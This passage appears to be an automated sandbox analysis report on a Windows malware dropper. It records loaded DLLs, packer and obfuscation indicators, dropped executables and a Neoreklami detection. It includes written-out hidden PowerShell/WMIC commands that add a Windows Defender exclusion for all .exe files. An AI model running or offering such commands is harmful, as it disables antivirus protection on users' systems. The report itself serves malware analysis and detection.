Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: httpprxp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wpdbusenum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: portabledeviceapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: devobj.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: portabledeviceconnectapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: w32time.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vmictimeprovider.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vmictimeprovider.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vmictimeprovider.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vmictimeprovider.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vmictimeprovider.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vmictimeprovider.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vmictimeprovider.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vmictimeprovider.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vmictimeprovider.dll
Source: C:\Windows\SysWOW64\forfiles.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\forfiles.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\forfiles.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\forfiles.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9ac9fbe1-e0a2-4ad6-b4ee-e212013ea917}\InProcServer32

Jump to behavior

Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe

File written: C:\Users\user\AppData\Local\Temp\!@tA09A.tmp.dir\setup.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: lgX7lgUL1w.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: lgX7lgUL1w.exe

Static file information: File size 1843424 > 1048576

Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Source: lgX7lgUL1w.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: lgX7lgUL1w.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: lgX7lgUL1w.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: lgX7lgUL1w.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: lgX7lgUL1w.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: lgX7lgUL1w.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: lgX7lgUL1w.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: lgX7lgUL1w.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460357142.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1457134681.0000000004DC2000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1458012640.0000000004D51000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1462785010.000000000515A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\x64\Release\XBundlerTlsHelper.pdb source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000000.1290598899.00000001409DF000.00000080.00000001.01000000.0000000E.sdmp
Source:	Binary string: C:\vmagent_new\bin\joblist\806392\out\Release\Installer.pdb source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1334164364.0000000004E44000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1335128422.0000000004F05000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: bash.pdbGCTL source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: bash.pdb source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: notepad.pdbGCTL source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: notepad.pdb source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000000.1290598899.0000000140BB1000.00000080.00000001.01000000.0000000E.sdmp
Source:	Binary string: auditpol.pdbGCTL source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\constructicon\builds\gfx\three\20.10\drivers\2d\dal\eeu\atieah\build\wNow64a\B_rel\atieah64.pdb source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000000.1290598899.0000000140BB1000.00000080.00000001.01000000.0000000E.sdmp
Source:	Binary string: F:\workspace\_work\1\s\artifacts\obj\win-x64.Release\corehost\cli\apphost\Release\apphost.pdbhhh source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420338649.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426212707.0000000004460000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426427943.0000000004461000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420528579.0000000004FA0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: F:\workspace\_work\1\s\artifacts\obj\win-x64.Release\corehost\cli\apphost\Release\apphost.pdb source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420338649.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426212707.0000000004460000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426427943.0000000004461000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420528579.0000000004FA0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\vmagent_new\bin\joblist\615425\out\Release\360Installer.pdb0pH\| source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000000.1257115899.0000000000471000.00000002.00000001.01000000.00000006.sdmp
Source:	Binary string: auditpol.pdb source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\vmagent_new\bin\joblist\615425\out\Release\360Installer.pdb source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000000.1257115899.0000000000471000.00000002.00000001.01000000.00000006.sdmp

Source: lgX7lgUL1w.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: lgX7lgUL1w.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: lgX7lgUL1w.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: lgX7lgUL1w.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: lgX7lgUL1w.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Unpacked PE file: 8.2.PZ3hKWPffUrXuh6Gjn77Ivv1.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\Pictures\E6ijlcXzCqRG7r61JO0b9evs.exe	Unpacked PE file: 38.2.E6ijlcXzCqRG7r61JO0b9evs.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell start-process -WindowStyle Hidden gpupdate.exe /force
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell start-process -WindowStyle Hidden gpupdate.exe /force

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe

Code function: 18_2_00418320 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

18_2_00418320

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .themida

PE file contains sections with non-standard names

Source: lgX7lgUL1w.exe	Static PE information: section name: .managed
Source: lgX7lgUL1w.exe	Static PE information: section name: hydrated
Source: lgX7lgUL1w.exe	Static PE information: section name: _RDATA
Source: lgX7lgUL1w.exe.0.dr	Static PE information: section name: .managed
Source: lgX7lgUL1w.exe.0.dr	Static PE information: section name: hydrated
Source: lgX7lgUL1w.exe.0.dr	Static PE information: section name: _RDATA
Source: DYOHZPW0D22LInRRNxYgymyV.exe.5.dr	Static PE information: section name:
Source: DYOHZPW0D22LInRRNxYgymyV.exe.5.dr	Static PE information: section name:
Source: DYOHZPW0D22LInRRNxYgymyV.exe.5.dr	Static PE information: section name: .themida
Source: EXHYoUWbk2EtGfzPiFxOh4fX.exe.5.dr	Static PE information: section name: .sxdata
Source: PBZVagSpvy50LOBQHCjW6qX9.exe.5.dr	Static PE information: section name:
Source: PBZVagSpvy50LOBQHCjW6qX9.exe.5.dr	Static PE information: section name:
Source: PBZVagSpvy50LOBQHCjW6qX9.exe.5.dr	Static PE information: section name: .themida
Source: o3bvuCFHWJf8oEmP3T0jhkMM.exe.5.dr	Static PE information: section name: .sxdata
Source: JRER40VeoC2Q4ducOjAkB8be.exe.5.dr	Static PE information: section name:
Source: JRER40VeoC2Q4ducOjAkB8be.exe.5.dr	Static PE information: section name:
Source: JRER40VeoC2Q4ducOjAkB8be.exe.5.dr	Static PE information: section name: .themida
Source: iYU7jmLL0jPLxgjctxjq1ReZ.exe.5.dr	Static PE information: section name: .sxdata
Source: 2nhKzHIgDWCzStH9EAQv4dqj.exe.5.dr	Static PE information: section name:
Source: 2nhKzHIgDWCzStH9EAQv4dqj.exe.5.dr	Static PE information: section name:
Source: 2nhKzHIgDWCzStH9EAQv4dqj.exe.5.dr	Static PE information: section name: .themida
Source: gsV4lhPLd9AgpTxUWWWokC1J.exe.5.dr	Static PE information: section name: .sxdata
Source: oZEH3cHEU5SysFjbUbbRDrah.exe.5.dr	Static PE information: section name:
Source: oZEH3cHEU5SysFjbUbbRDrah.exe.5.dr	Static PE information: section name:
Source: oZEH3cHEU5SysFjbUbbRDrah.exe.5.dr	Static PE information: section name: .themida
Source: M5ZhHB9e1LKNIZlvmmjrpriI.exe.5.dr	Static PE information: section name:
Source: M5ZhHB9e1LKNIZlvmmjrpriI.exe.5.dr	Static PE information: section name:
Source: M5ZhHB9e1LKNIZlvmmjrpriI.exe.5.dr	Static PE information: section name: .themida
Source: oabRgCI78gjFIFXr0JEwCrFT.exe.5.dr	Static PE information: section name:
Source: oabRgCI78gjFIFXr0JEwCrFT.exe.5.dr	Static PE information: section name:
Source: oabRgCI78gjFIFXr0JEwCrFT.exe.5.dr	Static PE information: section name: .themida
Source: rCs1RclDFMYQLymrwE3zboPd.exe.5.dr	Static PE information: section name: .sxdata
Source: c12YwoiQ34lE0LgBRkxJOClX.exe.5.dr	Static PE information: section name:
Source: c12YwoiQ34lE0LgBRkxJOClX.exe.5.dr	Static PE information: section name:
Source: c12YwoiQ34lE0LgBRkxJOClX.exe.5.dr	Static PE information: section name: .themida
Source: PkqGBlFfXQGSePxTvCIfv7cw.exe.5.dr	Static PE information: section name: .sxdata
Source: gX97xQ1DxOEiWzmKIb4DOJWg.exe.5.dr	Static PE information: section name: .sxdata
Source: xCvbsgibKaoe0JrKdFZUHTO3.exe.5.dr	Static PE information: section name:
Source: xCvbsgibKaoe0JrKdFZUHTO3.exe.5.dr	Static PE information: section name:
Source: xCvbsgibKaoe0JrKdFZUHTO3.exe.5.dr	Static PE information: section name: .themida
Source: KFwijURKZUrjToqwGsuVqcsD.exe.5.dr	Static PE information: section name: .sxdata
Source: aqGWEPmkK0B9sJyfEBtpOpuJ.exe.5.dr	Static PE information: section name:
Source: aqGWEPmkK0B9sJyfEBtpOpuJ.exe.5.dr	Static PE information: section name:
Source: aqGWEPmkK0B9sJyfEBtpOpuJ.exe.5.dr	Static PE information: section name: .themida
Source: 04MMWMll6oQNYP44niQAKG8f.exe.5.dr	Static PE information: section name:
Source: 04MMWMll6oQNYP44niQAKG8f.exe.5.dr	Static PE information: section name:
Source: 04MMWMll6oQNYP44niQAKG8f.exe.5.dr	Static PE information: section name: .themida
Source: JRzNWYaVkGhoqBVKINyNWHZb.exe.5.dr	Static PE information: section name: .sxdata
Source: VEH3hOo7SH8Curivn14XA2XL.exe.5.dr	Static PE information: section name:
Source: VEH3hOo7SH8Curivn14XA2XL.exe.5.dr	Static PE information: section name:
Source: VEH3hOo7SH8Curivn14XA2XL.exe.5.dr	Static PE information: section name: .themida
Source: zl9WjeKTxMy8k8EbTBZdpElC.exe.5.dr	Static PE information: section name: .sxdata
Source: z7qYuSNnmN1T20mVDPQyJKNf.exe.5.dr	Static PE information: section name:
Source: z7qYuSNnmN1T20mVDPQyJKNf.exe.5.dr	Static PE information: section name:
Source: z7qYuSNnmN1T20mVDPQyJKNf.exe.5.dr	Static PE information: section name: .themida

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Code function: 7_3_04D8E613 push ecx; retf	7_3_04D8E61B
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Code function: 8_2_00402CD7 push cs; retf	8_2_00402CD8
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Code function: 8_2_00401EA7 push 0000000Eh; retf 0038h	8_2_00401EB6
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Code function: 8_2_004033B6 push eax; ret	8_2_00403419
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Code function: 8_2_02E12D3E push cs; retf	8_2_02E12D3F
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Code function: 8_2_02E11F0E push 0000000Eh; retf 0038h	8_2_02E11F1D
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Code function: 8_2_0302391F push ss; iretw	8_2_03023931
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Code function: 8_2_03024934 push cs; retf	8_2_03024935
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Code function: 8_2_03023D52 push cs; retf 0038h	8_2_03023DD1
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Code function: 8_2_03024FA8 push eax; ret	8_2_03024FA9
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Code function: 8_2_03023DC2 push 0000000Eh; retf 0038h	8_2_03023DD1
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Code function: 8_2_03029DFE push 0000002Ah; iretd	8_2_03029E48
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Code function: 18_2_00411360 push ecx; mov dword ptr [esp], ecx	18_2_00411361
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Code function: 18_2_00413954 push eax; ret	18_2_00413972
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Code function: 18_2_00413CC0 push eax; ret	18_2_00413CEE
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Code function: 19_3_044174C2 push 0040E81Ch; ret	19_3_04417654
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Code function: 19_3_044174E0 push 0040E81Ch; ret	19_3_04417654
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Code function: 19_3_04421498 push ecx; mov dword ptr [esp], ecx	19_3_0442149B
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Code function: 19_3_044214B8 push ecx; mov dword ptr [esp], ecx	19_3_044214BB
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Code function: 19_3_0441064C push ecx; mov dword ptr [esp], eax	19_3_0441064D
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Code function: 19_3_0441765E push 0040E88Fh; ret	19_3_044176C7
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Code function: 19_3_04417660 push 0040E88Fh; ret	19_3_044176C7

Source: DYOHZPW0D22LInRRNxYgymyV.exe.5.dr	Static PE information: section name: entropy: 7.284719044401107
Source: PBZVagSpvy50LOBQHCjW6qX9.exe.5.dr	Static PE information: section name: entropy: 7.284719044401107
Source: JRER40VeoC2Q4ducOjAkB8be.exe.5.dr	Static PE information: section name: entropy: 7.284719044401107
Source: 2nhKzHIgDWCzStH9EAQv4dqj.exe.5.dr	Static PE information: section name: entropy: 7.284719044401107
Source: oZEH3cHEU5SysFjbUbbRDrah.exe.5.dr	Static PE information: section name: entropy: 7.284719044401107
Source: M5ZhHB9e1LKNIZlvmmjrpriI.exe.5.dr	Static PE information: section name: entropy: 7.284719044401107
Source: oabRgCI78gjFIFXr0JEwCrFT.exe.5.dr	Static PE information: section name: entropy: 7.284719044401107
Source: c12YwoiQ34lE0LgBRkxJOClX.exe.5.dr	Static PE information: section name: entropy: 7.284719044401107
Source: xCvbsgibKaoe0JrKdFZUHTO3.exe.5.dr	Static PE information: section name: entropy: 7.284719044401107
Source: aqGWEPmkK0B9sJyfEBtpOpuJ.exe.5.dr	Static PE information: section name: entropy: 7.284719044401107
Source: 04MMWMll6oQNYP44niQAKG8f.exe.5.dr	Static PE information: section name: entropy: 7.284719044401107
Source: VEH3hOo7SH8Curivn14XA2XL.exe.5.dr	Static PE information: section name: entropy: 7.284719044401107
Source: z7qYuSNnmN1T20mVDPQyJKNf.exe.5.dr	Static PE information: section name: entropy: 7.284719044401107

Persistence and Installation Behavior

Yara detected Neoreklami

Source: Yara match

File source: Process Memory Space: Install.exe PID: 8020, type: MEMORYSTR

Drops PE files to the document folder of the user

Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\wPxPcov2_iRQt91bGzfyQLn0.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\OZYSp_SuS64TdEhCce9XJabD.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\IzXa7ArplEUILx8JLGVvIms1.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\iWX2pBM7OP8AKRlxpYxKCjxp.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\JJ5skLlHHCJQmKA3fqFEF8WX.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\7uuYOubuRuTeu2Z5aoCcHRqr.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\Dwkvj_9aXUK5SRV0uUMfzWFw.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\1j9R8lifNJQPOos8jChy96bC.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\rKeuCT5BtcDJi3xnRhdYBXJ0.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\8uJfLKd9Ss22grd4NZfs8ESc.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\sCKRGnz9ufcbydLPdvMHEgfk.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\Vv3eq95tJE23PC8aGlGuTOwU.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\xCrl2X_yjihZJLjlfNXcaGsm.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\GLt6qc3E5xlMIXJ9xyvvME0a.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\0xzSXfvcS_VEarTqOdaPs4ts.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\949yVhltZoP9AEITjUlYclGY.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\3jK_1xVb8VV_A9ZblPqH0VLP.exe	Jump to dropped file

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe

Drops PE files

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\JEeghWLvEc5NBgQe7cVxX86V.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\JRER40VeoC2Q4ducOjAkB8be.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\wPxPcov2_iRQt91bGzfyQLn0.exe	Jump to dropped file
